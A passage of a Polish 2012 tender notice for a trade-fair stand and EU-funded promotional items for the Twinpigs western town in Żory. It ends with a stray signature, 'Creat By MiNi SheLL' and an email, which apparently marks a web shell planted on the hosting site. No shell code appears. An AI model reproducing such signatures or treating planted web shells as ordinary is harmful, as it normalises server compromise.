4.Wszelkie projekty wyjściowe, a także wszystkie pozostałe wersje winny być wykonane techniką komputerową w kolorze.
5.Projektant będzie także zobowiązany do wykonania i przedstawienia Zamawiającemu do akceptacji rzutów przestrzennych stoiska prezentującego jego ogólny wygląd. 

Stoisko powinno odpowiadać standardom wystawienniczym, a także zostać zaprojektowane w taki sposób, aby umożliwiało właściwą ekspozycje walorów Miasteczka Westernowego Twinpigs promowanego przez Spółkę. Stoisko powinno uwzględniać rozmiary powierzchni targowej wynajętej przez Zamawiającego (wymiary 7m x 7m).

Wystrój i wyposażenie stoiska - założenia techniczne i elementy obowiązkowe:
1.Lada ze schowkiem, przeznaczona do dystrybucji napojów.
2.4 lady informacyjne o wymiarach ok. 100X50
3.6 sztuki stojaków na ulotki i foldery w formacie A4.
4.2 nowoczesne ekrany plazmowe lub LCD (o wymiarach, co najmniej 42), celem prezentacji filmów promocyjnych.
5.Miejsce do spotkań dla wystawców i gości (3 stoły konferencyjne o wym. ok 80x80 cm każdy z 4 krzesłami)
6.Szafka na foldery - zamykana.
7.Zlewozmywak (wraz z termą i podłączeniem)
8.Szatnia (szafa ubraniowa) z wieszakami na ubrania wierzchnie dla Wystawcy.
9.Oświetlenie stosowne do zaprojektowanego wystroju.
10.Wykładzina dywanowa w kolorze dopasowanym do kolorystyki stoiska. 
11.Wydruki wielkoformatowe w pełnym kolorze, umieszczone w widocznym miejscu stoiska.
12.Wszystkie napisy muszą być wyraźne i czytelne, umieszczone na odpowiedniej wysokości widocznej dla odwiedzającego, a także wykonane uniwersalną czcionka i kolorem.
13.Projekt stoiska powinien zawierać obowiązkowe logotypy Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013.
14.Wykonawca zobowiązany jest wykonać niezbędne przyłącza (elektryczne), ustawienie mebli oraz wyposażenie stoiska wystawienniczego w tzw. elementy dekoracyjne.
15.Wykonawca zobowiązany jest przewieźć oraz rozładować na wyznaczone miejsca materiały promocyjne otrzymane od zamawiającego w stanie nienaruszonym i zgodnym z przekazanym opisem ilościowym i asortymentowym. 
16.Wykonawca zobowiązany jest uwzględnić warunki techniczne wskazane przez organizatorów targów: 
XVIII Międzynarodowych Targów Turystyki, Sprzętu Turystycznego, Żeglarskiego i Sportowego w Katowicach zamieszczone przez organizatora targów na jego stronie internetowej: www.glob.fairexpo.pl
XVII Targach Turystyki i Wypoczynku LATO w Warszawie na jego stronie internetowej: www.targilato.pl




Szczegółowy wykaz prac leżących w gestii Wykonawcy związanych z wykonaniem stoiska i jego transportem:
1.Wykonanie wszystkich elementów stoiska zgodnie z projektem.
2.Wykonanie zabudowy stanowiska typu wyspa zgodnie z projektem architektonicznym i graficznym, najpóźniej jeden dzień przed rozpoczęciem targów. 
3.Wyposażenie stoiska w elementy wymienione w niniejszej specyfikacji i projekcie
4.Wykonanie grafiki, napisów na fryzach i znaków wystawców na stoisku, zgodnie
z projektem.
5.Zapewnienie i pokrycie kosztów podłączenia energii elektrycznej (15kW) oraz nadzór nad jej sprawnym funkcjonowaniem.
6.Wyposażenie stoiska w czajnik, ekspres do kawy, naczynia oraz kosze na śmieci.
7.Aranżacja stoiska zgodnie z projektem.
8.Nadzór techniczny stoiska podczas jego eksploatacji.
9.Transport eksponatów, elementów zabudowy, wyposażenia i aranżacji stoiska.
10.Transport materiałów promocyjnych.

Szczegółowy wykaz zadań w zakresie kompleksowej obsługi targów w Warszawie:
	Wykonawca zobowiązany będzie dopełnić wszelkich formalności związanych z podróżą, zakwaterowaniem i wyżywieniem 4 osób:
a.zapewnienia i pokrycia kosztów transportu 4 osób samochodem z klimatyzacją oraz wydzielonymi fotelami na trasie: z Żor do Warszawy (do miejsca zakwaterowania) w dniu 19 kwietnia 2012 r. oraz z Warszawy (z miejsca zakwaterowania) do Żor w dniu 22 kwietnia 2012 r.
b.zapewnienia i pokrycia kosztów zakwaterowania dla 4 osób w Warszawie (3 noclegi w tym: pierwszy nocleg z 19-go na 20-go kwietnia 2012 r. drugi z 20 - go na 21-go kwietnia, trzeci z 21-go na 22-go kwietnia 2012 r.) w hotelu kategorii co najmniej trzy gwiazdkowym, zlokalizowanym nie dalej niż 30 minut środkami komunikacji publicznej od miejsca organizowania imprezy targowej, w pokojach jednoosobowych z łazienkami. Wykonawca przed zarezerwowaniem miejsca zakwaterowania przedstawi zamawiającemu, - co najmniej dwa hotele, które spełniają opisane powyżej wymagania do akceptacji.
c.Wykonawca zapewni i pokryje koszty wyżywienia dla 4 osób w hotelu (śniadania i obiadokolacje).
d.Wykonawca zobowiązany jest zawrzeć umowę ubezpieczenia dla 4 osób, które będą reprezentować Zamawiającego na targach. Ubezpieczenie musi obejmować odpowiedzialność od następstw nieszczęśliwych wypadków oraz odpowiedzialność cywilną w czasie podróży tam i z powrotem jak również podczas całego okresu pobytu. Polisę ubezpieczeniową Wykonawca przekaże zamawiającemu nie później niż 29 marca 2012 r - przed rozpoczęciem podróży.

Informacje dodatkowe:
1.Wykonawca zapewnia codzienne sprzątanie stoiska w trakcie i  po zamknięciu stoiska dla zwiedzających.
2.W gestii Wykonawcy leży demontaż stoiska..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa materiałów promujących Miasteczko Westernowe w ramach projektu pod nazwą Welcome to Twinpigs City - promocja regionalnego produktu turystycznego zlokalizowanego w Żorach współfinansowanego przez Unię Europejską z Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Śląskiego na lata 2007-2013.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy wykaz prac leżących w gestii Wykonawcy związanych z produkcją i dostarczeniem materiałów promocyjnych:
1.Zamawiający wymaga, aby materiały promocyjne były dobrej jakości, charakteryzowały się estetyką, elegancją oraz starannością wykonania.
2.Wykonawca zobowiązuję się do przygotowania projektu umieszczania wymaganych oznaczeń (logo, logotypy oraz opis w postaci Projekt współfinansowany przez Unię Europejską  z Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO WSL 2007-2013).
3.Wszystkie materiały promocyjne z wymaganymi oznaczeniami według zaakceptowanych wcześniej projektów przez Zamawiającego należy dostarczyć na koszt i ryzyko Wykonawcy do siedziby spółki Nowe Miasto Sp. z o.o. , ul. Boczna 6, 44-240 Żory.	

Szczegółowy opis materiałów promocyjnych:
Przedmiotem zamówienia są dostawy materiałów promocyjnych określonych i opisanych szczegółowo w poniższym wykazie.

L.P.	Nazwa artykułu	Ilość	Opis
1	Foldery	5 000 szt.	Folder - A4 pełen kolor okładka dwustronny wydruk kolorowy na papierze kredowym 250 g/m2(+/- 5%) wierzch foliowany. Środek 12 stron dwustronny wydruk kolorowy (pełen kolor) na papierze kredowym 170 g/m2 (+/- 5%). Wykończenie szycie zeszytowe. Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość). 
2	Maskotki	3 000 szt.	Maskotka kojarząca się z Dzikim Zachodem - materiał niecka welur wypełnienie kuleczki silikonowe typ o-wata wysokości od 15 cm do 20 cm z trwale umieszczonym logotypem. Dodatkowo do maskotki powinna być doszyta metka z dwustronnym nadrukiem: (1 strona) logotyp regionalnego produktu turystycznego z hasłem i odwołaniem do strony internetowej,(2 strona) zestaw logotypów Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013 oraz hasło informujące o źródle finansowania.
Wykonawca zobowiązuje się do przedstawienia 3 rodzajów, z których zamawiający wybierze 1. Pakowane pojedynczo w worek foliowy zgrzewany a następnie zbiorczo z opisem zawartości (rodzaj materiału promocyjnego oraz ilość).
3	Kubki	3 000 szt.	Kubek ceramiczny: pojemność 300 ml u dołu zwężany. Wykonawca zobowiązuje się do przedstawienia 3 rodzajów, z których zamawiający wybierze 1. Na wybranym kubku wykonawca wykona monochromatyczne logo wraz z odnośnikiem o źródle finansowania. Zamawiający zobowiązuje się przekazać materiał merytoryczny oraz ilustracje do opracowania projektu. 
Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość)
4	Smycze	7 000 szt.	Smycze - z tworzywa sztucznego, miękkiego materiału z karabińczykiem i nadrukiem obustronnym o szerokości 15mm. Wykonawca przedstawi dwa rodzaje smyczy, z których zamawiający wybierze jeden. Na wybranej smyczy wykonawca wykona logotyp wraz z odnośnikiem o źródle finansowania. Zamawiający zobowiązuje się przekazać materiał merytoryczny oraz ilustracje do opracowania projektu. Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość)
5	Ulotki	5 000 szt.	Ulotka- A5 pełen kolor, dwustronna papier kreda błysk 170 g/m2 (+/- 5%). Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość)
6	Długopisy	5 000 szt.	Długopis - jednokolorowy plastikowy (wciskany i wyciskany) z wkładem niebieskim wyposażony w metalowy klips. Wykonawca zobowiązuje się przedstawić 2 rodzaje, z czego zamawiający wybierze 1. Na wybranym długopisie na korpusie z prawej strony klipu wykonawca wykona logotyp wraz z odnośnikiem o źródle finansowania. Zamawiający zobowiązuje się przekazać materiał merytoryczny oraz ilustracje do opracowania projektu. 
Pakowanie: zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość).
7	Koszulki	1 500 szt.	Koszulka T-shirt - Koszulka T-shirt 4 wersje kolorystyczne, z czego zamawiający wybierze 2, o gramaturze nie mniejszej niż 180g/m2, 100 % bawełny, ściągacz wokół szyi, podwójne szwy przy rękawach i u dołu koszulki. Rozmiary koszulek od M do XL (w ilościach uzgodnionych z Zamawiającym)
Nadruk: monochromatyczne logo wraz z odnośnikiem o źródle finansowania z przodu koszulki o wymiarze, co najmniej 20x20cm (w zależności od rozmiaru koszulki); projekt i skład dostarcza Wykonawca do akceptacji Zamawiającego.
Pakowane w folie po jednej sztuce, a następnie zbiorczo w kartony + opis zawartości kartonu (rodzaj materiału promocyjnego oraz ilość).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com